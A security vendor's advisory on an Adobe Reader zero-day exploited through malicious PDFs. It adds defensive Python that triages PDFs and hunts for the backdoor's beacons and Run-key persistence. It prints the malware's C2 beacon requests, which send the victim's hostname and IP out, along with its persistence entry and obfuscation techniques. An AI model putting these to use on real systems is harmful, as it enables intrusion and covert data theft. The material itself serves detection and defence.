Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)

The SonicWALL UTM Research team has found reports of a new zero-day vulnerability, CVE-2011-2462, in Adobe Reader and Acrobat on Windows, Mac OS X, and UNIX. It is a memory corruption bug in the U3D (Universal 3D) component: a malformed U3D object can crash the application and may allow an attacker to execute arbitrary code and take control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning users about the flaw.

The SonicWALL UTM Research team has obtained an in-the-wild exploit for this vulnerability: a specially crafted PDF file containing obfuscated (encoded) malicious JavaScript and a malformed U3D object. The exploit may arrive as an e-mail attachment or be served from a malicious drive-by site.

A code snippet from the decoded JavaScript, which performs the heap spray and drops a malicious executable onto the target machine, is shown below:

screenshot
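The two ingredients described above, an embedded JavaScript action and a U3D stream, are exactly what a triage script should look for before a document reaches a vulnerable reader. The following is an added example written for this page, not SonicWALL code and not the exploit's JavaScript: it walks the object structure of a PDF, undoes the `#xx` name escaping and `FlateDecode` compression that real samples use to hide the `/JavaScript` and `/U3D` names from a naive grep, decodes `unescape('%xx')` string literals (the encoding layer this sample used), and flags the JavaScript-plus-U3D combination. The two PDF byte strings are constructed, benign skeletons; the stream lengths in them are illustrative and the code deliberately does not depend on them.

```python
import re
import zlib

# Constructed, benign PDF skeleton (not a real exploit): an /OpenAction that runs
# hex-escaped JavaScript, with the /JavaScript name itself #-escaped, plus a
# stream declared as a U3D 3D annotation. Lengths are illustrative only.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [6 0 R] >> endobj
4 0 obj << /S /J#61vaScript /JS 5 0 R >> endobj
5 0 obj << /Length 43 >>
stream
eval(unescape('%76%61%72%20%78%3d%31%3b'));
endstream
endobj
6 0 obj << /Type /Annot /Subtype /3D /3DD 7 0 R >> endobj
7 0 obj << /Type /3D /Subtype /U3D /Length 12 >>
stream
U3D\x00\x00\x00\x00\x00\x00\x00\x00\x00
endstream
endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# The same document with the JavaScript stream FlateDecode-compressed, which is
# how real samples usually hide the script from a plain-text search.
_JS_PLAIN = b"eval(unescape('%76%61%72%20%78%3d%31%3b'));"
_JS_FLATE = zlib.compress(_JS_PLAIN)
FLATE_SAMPLE_PDF = SAMPLE_PDF.replace(
    b"5 0 obj << /Length 43 >>\nstream\n" + _JS_PLAIN + b"\nendstream",
    b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(_JS_FLATE)
    + _JS_FLATE + b"\nendstream",
)

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.DOTALL)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
NAME_HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R")
JS_INLINE_RE = re.compile(rb"/JS\s*\((.*?)\)", re.DOTALL)
UNESCAPE_RE = re.compile(rb"unescape\(\s*['\"](.*?)['\"]\s*\)", re.DOTALL)
PCT_RE = re.compile(rb"%([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes in PDF names so that /J#61vaScript reads as /JavaScript."""
    return NAME_HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def objects(pdf: bytes) -> dict:
    """Map object number -> raw object body (dictionary plus any stream)."""
    return {int(num): body for num, body in OBJ_RE.findall(pdf)}


def dict_part(body: bytes) -> bytes:
    """The object's dictionary (everything before its stream), names normalized."""
    return normalize_names(body.split(b"stream", 1)[0])


def stream_data(body: bytes) -> bytes:
    """Return the stream payload, inflating it when /FlateDecode is declared."""
    m = STREAM_RE.search(body)
    if not m:
        return b""
    data = m.group(1)
    if b"/FlateDecode" in dict_part(body):
        try:
            data = zlib.decompress(data)
        except zlib.error:
            pass  # truncated or bogus stream: hand the raw bytes to the analyst
    return data


def extract_javascript(pdf: bytes) -> list:
    """Collect JavaScript bodies, inline (/JS (...)) or via a referenced stream."""
    objs = objects(pdf)
    found = []
    for body in objs.values():
        head = dict_part(body)
        for ref in JS_REF_RE.findall(head):
            if int(ref) in objs:
                found.append(stream_data(objs[int(ref)]))
        found.extend(JS_INLINE_RE.findall(head))
    return found


def decode_unescape(js: bytes) -> list:
    """Expand every unescape('%xx...') literal in a script into its plain bytes."""
    return [PCT_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m)
            for m in UNESCAPE_RE.findall(js)]


def has_u3d(pdf: bytes) -> bool:
    """True if any object is declared /U3D or carries a stream starting with 'U3D'."""
    return any(b"/U3D" in dict_part(b) or stream_data(b).startswith(b"U3D")
               for b in objects(pdf).values())


def triage(pdf: bytes) -> dict:
    """Summarize indicators; JavaScript together with a U3D stream drives the verdict."""
    heads = b" ".join(dict_part(b) for b in objects(pdf).values())
    js = extract_javascript(pdf)
    report = {
        "javascript": bool(js),
        "open_action": b"/OpenAction" in heads,
        "u3d": has_u3d(pdf),
        "decoded_js": [d for blob in js for d in decode_unescape(blob)],
    }
    report["suspicious"] = report["javascript"] and report["u3d"]
    return report


if __name__ == "__main__":
    for name, doc in (("plain", SAMPLE_PDF), ("flate", FLATE_SAMPLE_PDF)):
        print(name, triage(doc))
```

The verdict is deliberately a pairing rather than a single name match: legitimate documents contain JavaScript and 3D content on their own, but a file that carries both, auto-launched from `/OpenAction`, deserves a sandbox detonation before delivery. The script is a static first pass only; it does not follow object streams (`/ObjStm`) or other filters, so a negative result is not a clean bill of health.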

When opened, the malicious PDF file performs the following activity on the victim machine:

  • The encoded JavaScript sprays the heap so that the memory corruption triggered by the malformed U3D object lands on attacker-controlled data; once the exploit has run, the viewer is redirected to the second page of the document, as seen below.

    screenshot

    screenshot

  • It drops a backdoor Trojan onto the target machine and runs it:
    • (USER)\Local Settings\pretty.exe, detected as GAV: Wisp.A_2 (Trojan)
  • It creates a registry entry so that the backdoor runs again after a reboot:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\office = "(USER)\Local Settings\pretty.exe"
  • The dropped backdoor then attempts to connect to a remote server, prettyli(REMOVED)com, and sends the following requests; the hostname parameter identifies the victim by machine name and IP address, tagged with the string pretty20111122:
    • GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
    • GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
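The persistence entry and the beacon URLs above are the indicators a defender can hunt for without a SonicWALL appliance in the path. The following is an added example, not SonicWALL code: it scans proxy log lines for the two beacon paths (case-insensitively, since the sample mixes `/asp/kys_allow_get.asp` and `/ASP/KYS_ALLOW_PUT.ASP`), pulls the victim name, IP and tag out of the `hostname` parameter, and checks a `reg query` style dump of the HKCU Run key for autorun values pointing into a user-writable profile directory such as `Local Settings`. The log lines and registry dump are constructed; because the real C2 domain is redacted in this alert, `c2.example.invalid` stands in for it, and the detection keys on the path and query shape rather than the domain. Treating any Run entry under a user-writable directory as suspicious is a broader heuristic of mine, not something stated by the alert.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines, format: "timestamp client method url status".
# c2.example.invalid is a stand-in for the redacted prettyli(REMOVED)com host.
PROXY_LOG = """\
2011-12-09T10:15:02Z 10.1.2.3 GET https://c2.example.invalid/asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=WKS01-10.1.2.3-pretty20111122 200
2011-12-09T10:15:03Z 10.1.2.3 GET https://c2.example.invalid/ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=WKS01-10.1.2.3-pretty20111122 200
2011-12-09T10:16:40Z 10.1.2.7 GET https://www.example.com/asp/default.asp?name=index 200
2011-12-09T10:17:11Z 10.1.2.9 GET http://updates.example.org/kys_allow_get.asp?hostname=foo 404
"""

# Constructed dump in the shape of `reg query HKCU\...\Run` output.
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    office    REG_SZ    C:\Documents and Settings\alice\Local Settings\pretty.exe
    ctfmon    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

# The two beacon script names seen in the alert, matched without regard to case.
BEACON_PATH_RE = re.compile(r"/kys_allow_(get|put)\.asp$", re.I)
# <hostname>-<ipv4>-pretty<8 digits>: the victim tag format used by both beacons.
BEACON_TAG_RE = re.compile(
    r"^(?P<host>.+)-(?P<ip>\d{1,3}(?:\.\d{1,3}){3})-pretty(?P<tag>\d{8})$")

RUN_VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.+?)\s*$")
EXE_RE = re.compile(r'^"?(?P<exe>[^"]*?\.exe)', re.I)
# Directories an unprivileged user can write to; a legitimate autorun rarely lives here.
USER_WRITABLE = ("\\local settings\\", "\\application data\\", "\\appdata\\", "\\temp\\")


def classify_url(url: str):
    """Return None, or a dict describing why the URL looks like the Wisp beacon."""
    parts = urlsplit(url)
    m = BEACON_PATH_RE.search(parts.path)
    if not m:
        return None
    # Lower-case the parameter names: the PUT beacon spells it TYPE, the GET one name.
    query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    hit = {"op": m.group(1).lower(), "confidence": "low", "query": query}
    tag = BEACON_TAG_RE.match(query.get("hostname", ""))
    if tag:  # path and victim tag both match: high confidence
        hit.update(confidence="high", victim=tag["host"],
                   victim_ip=tag["ip"], tag=tag["tag"])
    return hit


def scan_proxy_log(text: str) -> list:
    """Run classify_url over each log line and keep the hits with their context."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        timestamp, client, _method, url, _status = fields[:5]
        hit = classify_url(url)
        if hit:
            hit.update(time=timestamp, client=client)
            hits.append(hit)
    return hits


def suspicious_run_entries(dump: str) -> list:
    """Flag Run values whose executable sits in a user-writable profile directory."""
    flagged = []
    for line in dump.splitlines():
        m = RUN_VALUE_RE.match(line)
        if not m:
            continue
        exe = EXE_RE.match(m["data"])
        if exe and any(marker in exe["exe"].lower() for marker in USER_WRITABLE):
            flagged.append((m["name"], exe["exe"]))
    return flagged


if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_LOG):
        print(hit["confidence"], hit["client"], hit["op"], hit.get("victim"))
    print(suspicious_run_entries(RUN_KEY_DUMP))
```

The fourth log line shows why two confidence levels are useful: a matching script name with a hostname parameter that does not fit the victim-tag pattern is worth a look but is not the beacon, whereas the first two lines match on both and also hand the analyst the infected machine's name and IP straight from the request. The Run-key check would be run on the host (for example on the output of `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"`) rather than over the network.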

SonicWALL UTM appliance provides protection against this threat via the following signatures:

  • GAV: CVE-2011-2462.A (Exploit)
  • IPS: Malformed PDF File 14b
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.